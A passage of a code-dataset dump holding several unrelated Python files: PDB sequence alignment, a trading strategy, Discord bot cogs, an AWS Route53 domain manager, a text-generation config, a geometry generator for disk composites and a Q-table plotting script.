'G',\n 'HIS': 'H', 'ILE':'I', 'LEU': 'L', 'LYS': 'K', 'MET': 'M', 'PHE': 'F', 'PRO': 'P', 'SER': 'S',\n 'THR': 'T', 'TRP': 'W', 'TYR': 'Y', 'VAL': 'V'}\n f = open(pdb_folder +'/' + pdb +'.pdb','r').readlines()\n link_lines = [l for l in f if l.startswith('LINK')] \n link_resi_in_chain = [] \n for l in link_lines:\n l_info = l.split()\n if l_info[3] == chain:\n link_resi_in_chain.append(l_info[2])\n if l_info[7] == chain:\n link_resi_in_chain.append(l_info[6])\n\n wanted_hetatms = [t for t in set(link_resi_in_chain) if not t in letters.keys()] \n\n if exp_type == 'SOLUTION NMR':\n for l in f:\n if l.startswith('MODEL'):\n chain_lines = []\n elif (l.startswith('ATOM') and l[21] == chain) or (l.startswith('HETATM') and l[21] == chain \\\n and (l[17:20].strip() in wanted_hetatms)):\n try:\n chain_lines.append(l)\n except ValueError:\n print('chain_lines not defined')\n\n elif l.startswith('ENDMDL'):\n break # only need to check the first model sequence in nmr structures \n\n else:\n chain_lines = [l for l in f if (l.startswith('ATOM') and l[21] == chain) or (l.startswith('HETATM') and l[21] == chain \\\n and (l[17:20].strip() in wanted_hetatms))]\n #chain_lines = [l for l in f if l.startswith('ATOM') or l and l[21] == chain]\n #print(pdb, chain)\n #print(chain_lines[0])\n resStart = chain_lines[0][22:26]\n resEnd = chain_lines[-1][22:26]\n\n res_id = None\n seq = ''\n for l in chain_lines:\n res_id_new = l[22:26]\n if not res_id_new == res_id:\n try:\n res_name = letters[l[17:20]] # if residue is normal amino 
acid \n except:\n res_name = 'x' # if residue is a modified aa \n seq = seq + res_name\n res_id = res_id_new\n\n else:\n continue\n\n return resStart, resEnd, seq\n\n @staticmethod\n def _align_seq(seq,temp_seq):\n '''\n\n :param seq: sequence to be aligned\n :param temp_seq: template sequence\n :return:\n head_diff: n terminal sequence extra or missing number of residues compared to template (int)\n end_diff: c terminal extra or missing number of residues (int)\n mutations: point mutations, format: Y12K\n '''\n\n def check_gap_and_mut(alignment_correct):\n aligned_seq = format_alignment(*alignment_correct).split('\\n')[0:3]\n\n gap_position = []\n gap_partner = []\n mutation = []\n for ind, x in enumerate(aligned_seq[1]):\n if x == ' ':\n gap_position.append(ind)\n if aligned_seq[0][ind] == '-':\n gap_partner.append(0) # seq = 0 \n else:\n gap_partner.append(1) # temp_seq = 1 \n elif x == '.':\n mut = aligned_seq[2][ind] + str(ind) + aligned_seq[0][ind]\n mutation.append(mut)\n\n\n #get sequence and template sequence gap position\n # seq = 0 and temp_seq = 1 in gap_partner array \n seq_gap_position = np.array(gap_position)[np.array(gap_partner)==0].tolist()\n temp_seq_gap_position = np.array(gap_position)[np.array(gap_partner) == 1].tolist()\n \n # get sequence gap groups by grouping continuous gap positions\n if len(seq_gap_position) > 1:\n seq_group_result = []\n for key, group in groupby(enumerate(seq_gap_position),lambda x: x[0]-x[1]):\n group_result = tuple(map(itemgetter(1),group))\n seq_group_result.append(group_result)\n\n elif len(seq_gap_position) == 1:\n seq_group_result = [(seq_gap_position[0],)]\n else:\n seq_group_result = []\n\n # get template sequence gap groups by grouping continuous gap positions\n if len(temp_seq_gap_position) > 1:\n\n temp_seq_group_result = []\n for key, group in groupby(enumerate(temp_seq_gap_position),lambda x:x[0] - x[1]):\n\n group_result = tuple(map(itemgetter(1),group))\n temp_seq_group_result.append(group_result)\n\n elif len(temp_seq_gap_position) == 1:\n temp_seq_group_result = [(temp_seq_gap_position[0],)]\n else:\n temp_seq_group_result = []\n\n\n head_diff = 0\n end_diff = 0\n\n #real gaps are those not at the termini\n seq_real_gaps = []\n temp_seq_real_gaps = []\n for gap in seq_group_result:\n\n if 0 in gap:\n head_diff = -len(gap)\n elif len(aligned_seq[1])-1 in gap:\n end_diff = -len(gap)\n else:\n seq_real_gaps.append(gap)\n\n for gap in temp_seq_group_result:\n if 0 in gap:\n head_diff = len(gap)\n elif len(aligned_seq[1])-1 in gap:\n end_diff = len(gap)\n else:\n temp_seq_real_gaps.append(gap)\n\n return head_diff,end_diff, mutation, aligned_seq[0], seq_real_gaps, temp_seq_real_gaps\n\n\n\n\n alignments = pairwise2.align.globalms(seq,temp_seq, 2, -1, -2, -0.1) # score identical characters 2, penalize a mismatch by -1, penalize opening a gap by -2 and extending a gap by -0.1\n if alignments[0][2] < 0.5 * 2 * len(temp_seq): #sequence alignment score is < 50% of a perfect match against the template sequence. 
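\n # arithmetic check: a 100-residue template scores at most 2*100 = 200 on a perfect match,\n # so an alignment scoring below 100 is rejected here and the chain is treated as a peptide ligand instead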
\n #print('poor_align')\n return None, None, None, None\n else:\n if len(alignments) > 1:\n #print('multiple alignments')\n template_gaps = float('inf')\n # if multiple alignment results, the one with least gaps is considered as final alignment results\n for i in alignments:\n head_diff,end_diff, mutation, aligned_seq,seq_real_gaps,temp_seq_real_gaps = check_gap_and_mut(i)\n if len(temp_seq_real_gaps) < template_gaps:\n alignment_correct = i\n template_gaps = len(temp_seq_real_gaps)\n\n else:\n alignment_correct = alignments[0]\n\n head_diff,end_diff, mutation, aligned_seq,seq_real_gaps,temp_seq_real_gaps = check_gap_and_mut(alignment_correct)\n\n mutation_new = []\n if len(temp_seq_real_gaps) > 0:\n\n\n gap_list = [pos for gap in temp_seq_real_gaps for pos in gap ]\n for j in mutation:\n shift_list = [pos for pos in gap_list if pos < int(j[1:-1])]\n shift = len(shift_list)\n mut_new = j[0] + str(int(j[1:-1]) - shift) + j[-1]\n mutation_new.append(mut_new)\n\n #print('warning: missing residues in template sequence!!!!!')\n else:\n mutation_new = mutation\n #if len(seq_real_gaps) > 0:\n #print('warning: missing residues in sequence')\n\n return head_diff, end_diff, mutation_new, aligned_seq\n\n","sub_path":"vs_pfm/data/pdb_info.py","file_name":"pdb_info.py","file_ext":"py","file_size_in_byte":33357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"510081377","text":"from BaseStrategy import BaseStrategy\nimport numpy as np\nimport datetime\n\nclass SimpleStrategy(BaseStrategy):\n def __init__(self, signal,price):\n \"\"\"\n Constructor of the class\n :param signal:\n \"\"\"\n self.signal= np.array(signal)\n self.length = signal.size\n self.__time__ = signal.index\n self.price = price\n\n def generate_position(self):\n \"\"\"\n Generate signal according strategy:\n :return: position\n \"\"\"\n curr_pos = 0\n position = np.zeros(self.length)\n \n for i in range(self.length):\n if self.signal[i]==np.sign(curr_pos)*(-1):\n position[i]=self.signal[i]-curr_pos\n curr_pos = self.signal[i]\n else:\n position[i]=self.signal[i]\n curr_pos+=self.signal[i]\n return position\n\n #def get_time_stamp(self):\n #return self.__time__\n\n #def get_prices(self):\n #return self.__bars__\n\n\n\n","sub_path":"Strategy/SimpleStrategy.py","file_name":"SimpleStrategy.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"377062613","text":"import aiohttp\nimport io\nimport re\n\nimport discord\nfrom discord.ext import commands\nimport html2text\nimport lxml.html\nfrom PIL import Image\n\nimport chickensmoothie as cs\n\n\nclass News(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases=['announce', 'announcement'])\n @commands.guild_only()\n async def news(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def on(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def off(self, ctx):\n pass\n\n @news.command()\n @commands.guild_only()\n async def latest(self, ctx):\n news_articles = await cs.get_announcements() # Get the HTML list of all the news articles\n latest = news_articles[0] # Get the latest (first) news\n post_date = latest.getparent().getprevious().text # Get the news post date\n\n image_link = None\n image_list = None\n multiple_images = False\n canvas = None\n if latest.find('a/img[@alt=\"Image\"]') is not None: # If news has click-able images\n if 
len(latest.findall('a/img[@alt=\"Image\"]')) == 1: # If there is only 1 image\n image_tag = latest.find('a/img[@alt=\"Image\"]') # Get the 'img' tag\n image_link = image_tag.xpath('@src')[0] # Extract image link for use in embed later\n parent = image_tag.getparent() # Get parent tag of 'img', which is 'a' tag\n latest.remove(parent) # Remove the 'a' tag so it won't be converted to Markdown\n else: # If there is more than 1 image\n image_list = latest.findall('a/img[@alt=\"Image\"]') # Get the links to all the images\n multiple_images = True\n elif latest.find('img[@alt=\"Image\"]') is not None: # If the news has static images instead\n if len(latest.findall('img[@alt=\"Image\"]')) == 1: # If there is only 1 image\n image_tag = latest.find('img[@alt=\"Image\"]') # Get the 'img' tag\n image_link = image_tag.xpath('@src')[0] # Extract image link for use in embed later\n latest.remove(image_tag) # Remove the 'img' tag so it won't be parsed later\n else: # If there is more than 1 image\n image_tags = latest.findall('img[@alt=\"Image\"]') # Get all image tags\n image_links = [element.xpath('@src')[0] for element in image_tags] # Get the links to the image\n image_links = [url.replace('//', 'https://') for url in image_links] # Replace relative links with absolute links\n\n image_list = []\n async with aiohttp.ClientSession() as session:\n for link in image_links:\n async with session.get(link) as response:\n connection = await response.read()\n image_list.append(io.BytesIO(connection)) # Convert the images into bytes\n multiple_images = True\n\n if multiple_images: # If there are multiple images\n pil_images = list(map(Image.open, image_list)) # Open all byte images as PIL images\n\n current_width = 0\n current_heights = []\n for image in pil_images:\n current_width += image.width\n current_heights.append(image.height)\n max_height = max(current_heights) # Get the height of the tallest image\n\n x_offset = 10 # The spacing between images\n canvas_width = current_width + (x_offset * len(pil_images))\n canvas_height = max_height\n\n canvas = Image.new('RGBA', (canvas_width, canvas_height)) # Create an empty RGBA image\n current_x = 0\n for image in pil_images:\n canvas.paste(image, (current_x, (max_height - image.height)), image)\n current_x += image.width + x_offset\n\n text = lxml.html.tostring(latest) # Get the source HTML of the news article\n text_decoded = text.decode('utf-8') # Decode into UTF-8\n\n bold_span_tags = re.findall(r'(([\\w\\W]+?))', text_decoded) # Find all tags used to bold text\n if bold_span_tags: # If there are bolded text\n for tag in bold_span_tags:\n text_decoded = text_decoded.replace(tag[0], f'%@^{tag[1]}%@^') # Change the tag to a temporary name\n\n emoji_list = re.findall(r'\\s*', text_decoded) # Check if there are emojis in the news article\n if emoji_list: # If there are emojis\n for emoji in emoji_list:\n text_decoded = text_decoded.replace(emoji, '') # Remove the emoji\n\n text_decoded = text_decoded.replace('//', 'https://') # Replace all relative links to prefix with HTTPS\n links = set(re.findall(r'href=\"(.*?)\"', text_decoded)) # Get all href links\n for link in links:\n text_decoded = text_decoded.replace(link, f'https://www.chickensmoothie.com{link}') # Prepend Chicken Smoothie base URL\n\n content = html2text.html2text(text_decoded) # Convert remaining HTML into Markdown\n\n content = content.replace(' \\n', '$#@') # Fix up broken newlines\n content = content.replace('\\n', ' ')\n content = content.replace('$#@', '\\n')\n content = content.replace('%@^', 
'**') # Replace temporary span markers with **\n content = content.replace('\n\n\n', '\n') # Remove duplicate newlines\n\n links = re.findall(r'\(http[s]*[\w\W]+?\)', content) # Get all links in the Markdown\n for link in links:\n fixed_link = link.replace(' ', '') # Remove any spacing in them\n content = content.replace(link, fixed_link)\n\n # Send embed\n embed = discord.Embed(title=post_date, description=content, colour=0x4ba139) # Create embed\n if multiple_images: # If there are multiple images\n output_buffer = io.BytesIO() # Convert the PIL output into bytes\n canvas.save(output_buffer, 'png') # Save the bytes as a PNG format\n output_buffer.seek(0) # Move the 'cursor' back to the start\n await ctx.send(embed=embed, file=discord.File(fp=output_buffer, filename='news.png')) # Upload the file to the channel where the message came from\n elif image_link is not None: # If an image exists in the news\n embed.set_image(url=f'https:{image_link}') # Set embed image\n await ctx.send(embed=embed) # Send message\n else:\n await ctx.send(embed=embed) # Send message\n\n\ndef setup(bot):\n bot.add_cog(News(bot))\n","sub_path":"cogs/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":6640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3833397","text":"'''\n Write a program to calculate the average of five inputted marks.\n\n'''\nmarks_data = []\nsub_count = 5\ndef getData():\n for i in range(sub_count):\n inp = float(input(\"Enter the marks: \"))\n if 0<=inp<=100:\n marks_data.append(inp)\n else:\n print(\"Invalid marks entered\")\n\ndef calData():\n l_marks_data = len(marks_data)\n calc = 0\n if l_marks_data == 5:\n for i in marks_data:\n calc = calc + i\n print(f\"Average of marks entered is: {calc/l_marks_data}\")\n else:\n print(\"Insufficient list of marks!\")\n\nif __name__ == \"__main__\":\n getData()\n calData()\n    ","sub_path":"assignment4/average.py","file_name":"average.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263361297","text":"# https://codechalleng.es/bites/180/\n\nfrom collections import defaultdict\n\n# fake data from https://www.mockaroo.com\ndata = \"\"\"last_name,first_name,country_code\nWatsham,Husain,ID\nHarrold,Alphonso,BR\nApdell,Margo,CN\nTomblings,Deerdre,RU\nWasielewski,Sula,ID\nJeffry,Rudolph,TD\nBrenston,Luke,SE\nParrett,Ines,CN\nBraunle,Kermit,PL\nHalbard,Davie,CN\"\"\"\n\n\ndef group_names_by_country(data: str = data) -> defaultdict:\n countries = defaultdict(list)\n for line in data.split('\\n'):\n last_name, first_name, country = line.split(',')\n countries[country].append(f\"{first_name} {last_name}\")\n countries.pop('country_code', None)\n return countries\n\n\nif __name__ == '__main__':\n group_names_by_country(data)\n","sub_path":"bites/bite180_names.py","file_name":"bite180_names.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"27691819","text":"import discord\nimport asyncio\nfrom logger import log\n\n\nasync def ex(args, message, client, invoke):\n author = message.author.name\n channel = message.channel.__str__()[20:]\n if author != channel:\n try:\n ammount = int(args[0]) + 1 if len(args) > 0 else 2\n except ValueError:\n await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.red(), description=\"Please enter a valid number instead of %s\" % args[0]))\n return\n\n messages = 
[]\n async for m in client.logs_from(message.channel, limit=ammount):\n messages.append(m)\n\n await client.delete_messages(messages)\n\n return_msg = await client.send_message(message.channel, embed=discord.Embed(color=discord.Color.blue(), description=\"Cleared %s message(s).\" % ammount))\n await asyncio.sleep(4)\n await client.delete_message(return_msg)\n else:\n await client.send_message(message.author, embed=discord.Embed(color=discord.Color.red(), description=\"Can't delete direct messages!\"))\n log(\"Could not clear message(s)!\", \"error\")\n","sub_path":"commands/cmd_clear.py","file_name":"cmd_clear.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39017480","text":"# from openpyxl import Workbook\n# wb = Workbook() # create a new workbook\n# ws = wb.active\n# ws.title = \"NadoShee\"\n# ws.sheet_properties.tabColor = \"ff66ff\"\n# for x in range (1,11):\n# c= ws.cell(row = x, column = 1, value = 4)\n# print (c.value)\n# print(ws.max_row)\n\n# wb.save(\"sample.xlsx\")\n# wb.close()\n\nimport glob\nfilelocation = input(\"Enter the folder location: \")\nfiletype = input(\"Enter the file type: \")\nmyList = glob.glob(filelocation + \"\\*.\" + filetype)\nif not myList:\n fileresult = input(\"Something went wrong\")\nelse:\n print (*myList, sep = \"\\n\")\n fileresult = input(\"Here they are\") \n\n# print (os.path.abspath(\"17194.xls\"))\n\n# A program that lists which files are in a given folder\n\n#C:\\Users\\Dave\\Documents\\정석윤\\9. 매크로 프로젝트\\gunsan\\*.xls\n\n#my testbed for coding xls\n","sub_path":"rpa_basic/1_excel/1_create_file.py","file_name":"1_create_file.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3209459","text":"\"\"\"Class for Route53 domains.\"\"\"\n\n\nclass DomainManager:\n \"\"\"Manage a Route53 domain.\"\"\"\n\n def __init__(self, session):\n \"\"\"Create DomainManager object.\"\"\"\n self.session = session\n self.route53_client = session.client('route53')\n\n def find_hosted_zone(self, domain_name):\n \"\"\"Find a hosted zone of the domain.\"\"\"\n paginator = self.route53_client.get_paginator('list_hosted_zones')\n\n for page in paginator.paginate():\n for zone in page['HostedZones']:\n if domain_name.endswith(zone['Name'][:-1]):\n return zone\n\n return None\n\n def create_s3_domain_record(self, zone, domain_name, endpoint):\n \"\"\"Create an A record for the domain name.\"\"\"\n return self.route53_client.change_resource_record_sets(\n HostedZoneId=zone['Id'],\n ChangeBatch={\n 'Comment': 'Created by boto3 lib',\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': domain_name,\n 'Type': 'A',\n 'AliasTarget': {\n 'HostedZoneId': endpoint.zone,\n 'DNSName': endpoint.host,\n 'EvaluateTargetHealth': False\n }\n }\n\n }]\n }\n\n )\n\n def create_cf_domain_record(self, zone, domain_name, cf_domain):\n \"\"\"Create a domain record in zone for domain_name.\"\"\"\n print(zone, domain_name, cf_domain)\n return self.route53_client.change_resource_record_sets(\n HostedZoneId=zone['Id'],\n ChangeBatch={\n 'Comment': 'Created by boto3 lib',\n 'Changes': [{\n 'Action': 'UPSERT',\n 'ResourceRecordSet': {\n 'Name': domain_name,\n 'Type': 'A',\n 'AliasTarget': {\n 'HostedZoneId': 'Z2FDTNDATAQYW2',\n 'DNSName': cf_domain,\n 'EvaluateTargetHealth': False\n }\n }\n\n }]\n }\n\n 
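# 'Z2FDTNDATAQYW2' above is the fixed, global hosted-zone ID that AWS assigns to every CloudFront distribution, so it is safe to hard-code for alias records\n 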
)\n","sub_path":"scripts/domain.py","file_name":"domain.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"378424670","text":"# coding=utf-8\nimport unicodedata\nclass config_predict(object):\n def __init__(self,model_config='', doPredict = [1,1,1,1]): #__init__() 是类的初始化方法;它在类的实例化操作后 会自动调用,不需要手动调用;\n # 设置属性\n self.stopwords = [\" \", \" \", \" \", \",\", \",\", \".\", \"。\", \"、\", \"!\", \"!\", \"?\", \"?\", \";\", \";\", \"~\", \"~\", \"·\", \"·\", \".\", \"…\", \"-\",\n \"#_\", \"—\", \"+\", \"=\", \"'\", \"\\\"\", \"‘\", \"’\", \"“\", \"”\", \"*\", \"&\", \"^\", \"%\", \"$\", \"/\", \"\\\\\", \"@\"]\n self.stopwords,self.map_e2z = self.addStopwords()\n self.blackwords = ['自杀','死','火葬','我是你爸爸','我是你妈妈']\n self.specialwords_pre = ['祝福', '祝愿', '预祝']\n self.specialwords_gen = ['生日', '新年', '新春', '春节', '节日', '元旦']\n self.singlewords = ['哈','啊','哦','哦','呵','嘿','哎','哼']\n self.removed_words = ['⊙']\n self.punc_end = '.?!。?!》>'\n self.path_HighFreqWords = '../data/words_highFreq.txt'\n self.HighFreqWords = self.getHFW()\n self.min_contenlen = 8\n self.rate_gen2inp = 1.4\n self.batchGenerating = True\n self.max_nb_sents=4\n self.gpus = ['5','6','7']\n self.style = ['poem','prose','gou']\n if len(model_config)==0:\n self.model_configs = ['demo_config/config_poem.json','demo_config/config_godText_small_finetune_merged.json',\n 'demo_config/config_dabaigou.json']\n else:\n if type(model_config)==list:\n self.model_configs = model_config\n else:\n self.model_configs = [model_config]\n self.predict_nums = [4, 8, 8, 5]\n self.tags = ['(诗)', '(文)', '(大白狗)', '(句联想)']\n self.doPredict = [t==1 for t in doPredict]\n self.rmHFW = [False, False, True, False]\n self.maxNext_JLX = 3\n self.path_JLX_next = 'model/nnlm/D_next.json'\n self.path_JLX_simi = 'model/nnlm/D_simi.json'\n self.prefixTrim = True\n self.useThread = True\n self.fast_pattern = True\n self.repetition_penalty = [1.5,1.2,1.2]\n self.temperature = [0.7,0.6,0.5]\n self.length = [64,30,30]\n self.resort = True\n def addStopwords(self):\n punc_zh = \"!?。"#$%&'()*+,-/:;<=>@[\]^_`{|}~⦅⦆「」、、〃》「」『』【】〔〕〖〗〘〙〚〛〜〝〞〟〰〾〿–—‘’‛“”„‟‧﹏.…\"\n punc_en = unicodedata.normalize('NFKC', punc_zh[:-1]) + unicodedata.normalize('NFKC', punc_zh[-1])[-1]\n punc_zh = punc_zh + '。'\n punc_en = punc_en + '。'\n map_e2z = {punc_en[i]: punc_zh[i] for i in range(len(punc_en))}\n stopwords = self.stopwords + list(punc_zh) + list(punc_en)\n stopwords = list(set(stopwords))\n return stopwords,map_e2z\n def getHFW(self):\n with open(self.path_HighFreqWords,'r') as f:\n s = f.read().strip().split('\\n')\n return s\n","sub_path":"test_online/Config.py","file_name":"Config.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33882772","text":"#!/usr/bin/env python3\n# coding utf-8\n\nimport cProfile\n\nimport copy\nimport math\nimport numpy as np\nimport random\nfrom datetime import datetime\n\nimport pprint\npprint = pprint.PrettyPrinter(indent=4).pprint\n\nfrom Classes.MatricesPrinter import MatricesPrinter\nfrom Classes.Options import Options\nfrom Classes.Point import Point\nfrom Classes.PolygonCylinderInTheShell import PolygonCylinderInTheShell\nfrom Classes.PropertiesPrinter import PropertiesPrinter\nfrom Classes.Vector import Vector\n\nfrom functions.boxCross import boxCross\nfrom functions.boxCrossByDiskInTheShell import boxCrossByDiskInTheShell\nfrom functions.checkPercolation import 
checkPercolation\nfrom functions.diskDiskInTheShellCross import diskDiskInTheShellCross\nfrom functions.disksCross import disksCross\nfrom functions.disksInTheShellCross import disksInTheShellCross\n\n\ndef mainExfoliation():\n o = Options()\n maxhMatrix = o.getProperty('maxh_m')\n maxhFiller = o.getProperty('maxh_f')\n maxhShell = o.getProperty('maxh_sh')\n desiredDisksNumber = int(o.getProperty('numberOfDisks'))\n maxAttempts = o.getProperty('maxAttempts')\n pcs = []\n l = o.getProperty('cubeEdgeLength')\n #cellString = 'solid cell = orthobrick(0, 0, 0;'\n #cellString += ' {0}, {0}, {0});\\n'.format(l)\n cellString = 'solid cell = plane(0, 0, {0}; 0, 0, {0})'.format(l)\n cellString += ' and plane(0, {0}, 0; 0, {0}, 0)'.format(l)\n cellString += ' and plane({0}, 0, 0; {0}, 0, 0)'.format(l)\n cellString += ' and plane(0, 0, 0; 0, 0, -{0})'.format(l)\n cellString += ' and plane(0, 0, 0; 0, -{0}, 0)'.format(l)\n cellString += ' and plane(0, 0, 0; -{0}, 0, 0);\\n'.format(l)\n matrixString = 'solid matrix = cell'\n attempt = 0\n v = o.getProperty('verticesNumber')\n r = o.getProperty('polygonalDiskRadius')\n h = o.getProperty('polygonalDiskThickness')\n ready = 0\n tmpPcs = []\n while ready < desiredDisksNumber and attempt < maxAttempts:\n attempt += 1\n if len(pcs) > 0:\n name = int(pcs[len(pcs) - 1].number()) + 1\n pc = PolygonCylinderInTheShell(r, h, name, int(v))\n else:\n pc = PolygonCylinderInTheShell(r, h, 0, int(v))\n random.seed(datetime.now())\n alpha = random.random() * 2 * math.pi\n beta = random.random() * 2 * math.pi\n gamma = random.random() * 2 * math.pi\n # rotate around 0x\n pc.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, math.cos(alpha), -math.sin(alpha), 0],\n [0, math.sin(alpha), math.cos(alpha), 0],\n [0, 0, 0, 1]\n ]))\n # rotate around 0y\n pc.changeByMatrix(np.array([\n [math.cos(beta), 0, math.sin(beta), 0],\n [0, 1, 0, 0],\n [-math.sin(beta), 0, math.cos(beta), 0],\n [0, 0, 0, 1]\n ]))\n # rotate around 0z\n pc.changeByMatrix(np.array([\n [math.cos(gamma), -math.sin(gamma), 0, 0],\n [math.sin(gamma), math.cos(gamma), 0, 0],\n [0, 0, 1, 0],\n [0, 0, 0, 1]\n ]))\n # translate into random point of the box\n dx = l * random.random()\n dy = l * random.random()\n dz = l * random.random()\n pc.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [dx, dy, dz, 1]\n ]))\n tmpPcs = []\n copiedCount = 0\n pcToCheck = None\n for ix in [-1, 0, 1]:\n for iy in [-1, 0, 1]:\n for iz in [-1, 0, 1]:\n pc1 = copy.copy(pc)\n pc1.setCopied(copiedCount)\n copiedCount += 1\n pc1.changeByMatrix(np.array([\n [1, 0, 0, 0],\n [0, 1, 0, 0],\n [0, 0, 1, 0],\n [ix * l, iy * l, iz * l, 1]\n ]))\n tmpPcs.append(pc1)\n if (ix, iy, iz) == (0, 0, 0):\n pcToCheck = pc1\n flag = 0\n for oldPc in pcs:\n #for pc in tmpPcs:\n # if disksCross(oldPc, pc) or\\\n # disksCross(pc, oldPc) or\\\n # diskDiskInTheShellCross(oldPc, pc) or\\\n # diskDiskInTheShellCross(pc, oldPc):\n # flag = 1\n # break\n if disksCross(oldPc, pc) or\\\n disksCross(pc, oldPc) or\\\n diskDiskInTheShellCross(oldPc, pc) or\\\n diskDiskInTheShellCross(pc, oldPc):\n flag = 1\n break\n if flag != 1:\n ready += 1\n for pc in tmpPcs:\n pcs.append(pc)\n \n toPop = []\n for i, pc in enumerate(pcs):\n c = pc.c()\n if not 0 < c.x() < l or not 0 < c.y() < l or not 0 < c.z() < l:\n if not boxCrossByDiskInTheShell(pc):\n toPop.append(i)\n for i in toPop[::-1]:\n pcs.pop(i)\n s = 'End of attempt {0} ready {1} of {2}'\n print(s.format(attempt, ready, desiredDisksNumber))\n print('Checking for percolation len is 
{}'.format(len(pcs)))\n for pc in pcs:\n print(pc)\n checkPercolation(pcs)\n s = ' and not filler and not shell;\\ntlo matrix -transparent -maxh={0};\\n'\n matrixString += s.format(maxhMatrix)\n f = open(o.getProperty('fname'), 'w')\n f.write('algebraic3d\\n')\n f.write(cellString)\n if len(pcs) > 0:\n fillerString = 'solid filler = cell and ('\n shellString = 'solid shell = cell and ('\n for i, pc in enumerate(pcs):\n pc.printToCSG(f)\n if i != 0:\n fillerString += ' or polygonalDisk{0}'.format(pc.number())\n shellString += ' or pdShell{0}'.format(pc.number())\n else:\n fillerString += 'polygonalDisk{0}'.format(pc.number())\n shellString += 'pdShell{0}'.format(pc.number())\n fillerString += ');\\ntlo filler -maxh={0};\\n'.format(maxhFiller)\n s = ') and not filler;\\ntlo shell -maxh={0};\\n'\n shellString += s.format(maxhShell)\n f.write(fillerString)\n f.write(shellString)\n f.write(matrixString)\n print('Volume fraction is {}'.format(ready * math.pi * r**2 * h / l**3))\n mp = MatricesPrinter(pcs)\n pp = PropertiesPrinter(pcs)\n\n \nmainExfoliation()\n","sub_path":"mainExfoliationShellPeriodic.py","file_name":"mainExfoliationShellPeriodic.py","file_ext":"py","file_size_in_byte":7017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600218024","text":"import bmm.parameters as para\n\nenv_type = para.game_version\nalgorithm_type = para.algorithms\npolicy_type = para.policy_type\ngame_type = para.game_type\npath = para.DataSavePath\n\nresult_dir = 'results-{0}-{1}-{2}-{3}'.format(env_type, algorithm_type, policy_type, game_type)\n\n\nimport numpy as np\nimport pandas as pd\n\nwindow_size = 100\nadjustment_rate_plot_range = 1\nwindow = 995000\nprint_episode = para.print_episode\n\n# Load Q value table\nplot_Q_list = [] # Initialize the Q_list for plot\nQ_table = np.load(path + 'numpy_data/' + result_dir + '/' + 'q_table_' + str(print_episode) + \".npy\") # Load Q_table\nPE_rows = np.array(np.arange(para.state_limits)) # States Prediction errors\nAR_cols = np.array([0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]) # Actions: adjustment rate\n\n# Result save path\nsave_path = path + 'plot_results/' + result_dir\n\nimport numpy as np\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport os\nimport matplotlib\nimport numpy as np\nimport matplotlib.cm as cm\nimport matplotlib.mlab as mlab\nfrom matplotlib.ticker import LinearLocator, FormatStrFormatter\nimport matplotlib.pyplot as plt\n\nmatplotlib.rcParams['xtick.direction'] = 'out'\nmatplotlib.rcParams['ytick.direction'] = 'out'\n\ndelta = 0.025\nx = PE_rows\ny = AR_cols\n\n\nX, Y = np.meshgrid(x, y)\n\nZ = np.array(Q_table)\nZ = np.transpose(Z)\n\nfig = plt.figure()\nplt.rc('font', family='serif', size=13)\n\nax = fig.gca(projection = '3d')\nsurf=ax.plot_surface(Y, X, Z, rstride=1, cstride=1,cmap=cm.coolwarm,\n linewidth=0, antialiased=True)\nax.contour(Y, X, Z, zdir='z', offset=np.min(Z)-1, cmap=cm.coolwarm)\nax.set_xlabel('Adjustment Rate')\nif para.game_version == \"OutlierGame-v1\":\n ax.set_ylabel('State')\nelif para.game_version == \"OutlierGame-v2\":\n ax.set_ylabel('State')\nax.set_zlabel('Q value')\nax.zaxis.set_major_locator(LinearLocator(6))\nax.zaxis.set_major_formatter(FormatStrFormatter('%.02f'))\nfig.colorbar(surf, shrink=0.5, aspect=5) # colour 
